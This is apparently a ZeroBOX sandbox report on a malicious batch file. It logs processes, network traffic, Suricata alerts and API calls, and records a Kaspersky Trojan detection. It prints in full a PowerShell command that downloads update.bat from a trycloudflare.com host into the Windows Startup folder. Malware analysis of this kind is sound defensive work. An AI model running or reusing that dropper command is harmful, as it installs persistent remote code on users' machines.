Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 4, 2025, 12:45 p.m.	May 4, 2025, 1:08 p.m.

Size	807.0B
Type	DOS batch file, ASCII text, with CRLF line terminators
MD5	`034781001aa560c6139e956ab778a98b`
SHA256	`3c981c94ae3ad98a5361db8bd41a321380c268afc7c3cc8898fa4171038fe132`
CRC32	`DF1F580D`
ssdeep	`24:wq+RfM/N5uQZudDm5t0O4wuVMxudZxeaR3u7za95A9g1ZBXG1LT:akXuQD0wu0oxW45A90ZBWv`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "NoMAczMbLRBPHqCT" C:\Users\test22\AppData\Local\Temp\de.bat
2544
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\de.bat
  2616
  - powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://minutes-amazing-curriculum-maui.trycloudflare.com/update.bat', 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat')"
    2704

Name	Response	Post-Analysis Lookup
minutes-amazing-curriculum-maui.trycloudflare.com	A 104.16.231.132 A 104.16.230.132	104.16.230.132

IP Address	Status	Action
104.16.230.132	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:59002 -> 164.124.101.2:53	2034552	ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)	Potentially Bad Traffic
TCP 192.168.56.101:49167 -> 104.16.230.132:443	2058175	ET HUNTING TryCloudFlare Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49167 -> 104.16.230.132:443	2060250	ET INFO Observed trycloudflare .com Domain in TLS SNI	Misc activity
TCP 192.168.56.101:49167 -> 104.16.230.132:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49167 104.16.230.132:443	C=US, O=Google Trust Services, CN=WR1	CN=trycloudflare.com	37:c4:c9:15:20:43:92:11:a9:ae:35:6c:c0:03:cb:d8:e0:9c:37:6b

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 4, 2025, 12:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 4, 2025, 12:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 4, 2025, 12:45 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 4, 2025, 12:45 p.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: Downloading file... console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: Success C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat console_handle: 0x00000007	1	1
WriteConsoleW May 4, 2025, 12:45 p.m.	buffer: Press any key to continue . . . console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (40 events)

Time & API	Arguments	Status	Return
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f1260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f17e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f17e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f17e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f1360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f1360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f1360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f1360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f1360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f1360 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0e20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f17e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f17e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f17e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f16e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f17e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f17e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f17e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f17e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f17e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f17e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f17e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f0f60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f1be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f1be0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 4, 2025, 12:45 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://minutes-amazing-curriculum-maui.trycloudflare.com/update.bat

Performs some HTTP requests (1 event)

request

GET https://minutes-amazing-curriculum-maui.trycloudflare.com/update.bat

Allocates read-write-execute memory (usually to unpack itself) (50 out of 138 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02520000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02530000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02531000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02532000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02727000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02970000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02713000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02714000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02716000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02717000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02718000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02719000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b54000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b55000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b56000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b57000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b58000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b59000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b5a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b5b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b5c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b5d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b5e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b5f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b63000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:45 p.m.	process_identifier: 2704 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://minutes-amazing-curriculum-maui.trycloudflare.com/update.bat', 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat')"

File has been identified by one AntiVirus engine on VirusTotal as malicious (1 event)

Kaspersky

HEUR:Trojan.BAT.Alien.gen

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 4, 2025, 12:45 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (18 events)

Data received	[
Data received	WhçÝ²%»äµjQsv ¬H.DOWNGRD }-T"~Ôk²åÔéÚ¯ôú°L5½Ëà{=cÀÿ
Data received	Ë
Data received	ÇÄF0B0* /í7o úl q«Ï0 H÷ 0;10 UUS10U Google Trust Services10 UWR10 250422165136Z 250721174959Z010Utrycloudflare.com0"0 H÷ 0 »oçUkªÎª9ÒhäYMoM"ÃÑ³;=ÃG¼ãÇJPiçåÀ(°[ïDü2¢ÁxÚòß§cÐñÒ 7"7µbíZ()mûâæö ÁÍØX¶+çójØÜùj^´qÞWe^GHg;°ÒìcÞýa%pM³ê ÁSñÿQç¿DoMm¸Ã¹¹Uîä0Éf µÒÕÕXkPtr}kV¡¶ØÔÁ£ËD¸X}ëùU&·"»<Éóp7ôfä±0ÊöJÙ5¬¢/ec@xVR¹QG®sÁ^ÞhPl¦Îë£_0[0Uÿ 0U%0 +0Uÿ00Uï9þâ¾òf{JVÄ7{0U#0fiIÔÞÏ$¸0n.0^+R0P0'+0http://o.pki.goog/s/wr1/L5I0%+0http://i.pki.goog/wr1.crt01U0(trycloudflare.com.trycloudflare.com0U 0 0g06U/0-0+ ) '%http://c.pki.goog/wr1/Cj_AnkL3zwk.crl0 +Öyõòðw}Yáx{ag\|^ýøÐ\ N¹/Ù.y¸^ xÂH0F!ãþlÍ:s1L±ðâ'K7ûµÐ}¯£ÁHkHû÷!µQpNÃÉd×;w Ð Íph9þw7é[uÝÜÊ4×áç2úÇø=PßÛ:v ,¬»È^ xÐF0D ÈIå&\|Ã:LsE6ï¿ofÔÅMã ß¼I $ó22äAZ¶W1 ·4á²¦O ª.jî0 H÷ jÏÞì§D¦°J¨Tñ Æ~\|±ª~kj§Vt½õavuöí¦×®fø&sÙõhÆ·ÄõCqºæ!èÁÆR½4a0S»ê3ÍågfGÂ:øv5VvóÖÈgw+7éó¾)î¬!Wt-xæ?âózU ~l!¬/#õé 1&=<¾Ê¡ËÒæ³±oSrá¸!Q=ß?Ã5®pì 